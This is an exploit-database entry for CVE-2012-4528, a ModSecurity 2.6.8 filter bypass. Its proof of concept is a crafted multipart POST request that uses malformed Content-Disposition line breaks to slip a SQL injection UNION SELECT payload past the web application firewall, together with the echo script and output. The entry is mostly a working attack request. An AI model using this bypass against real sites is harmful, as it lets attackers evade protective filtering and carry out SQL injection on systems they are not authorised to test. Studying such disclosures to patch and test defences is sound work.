EXPLOITS

ModSecurity - 'POST' Security Bypass

Author: Bernhard Mueller
type: remote
platform: linux
port: 
date_added: 2012-10-17  
date_updated: 2017-10-17  
verified: 1  
codes: CVE-2012-4528;OSVDB-86408  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 37949.txt  

source: https://www.securityfocus.com/bid/56096/info

ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.

Successful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.

ModSecurity 2.6.8 is vulnerable; other versions may also be affected.

Proof of concept:
-----------------

wut.php:
--------

<? echo $POST[xxx] ?>


POST request:
-------------

POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161

--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--


Output:
-------

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

(any change in the header should produce a 403)d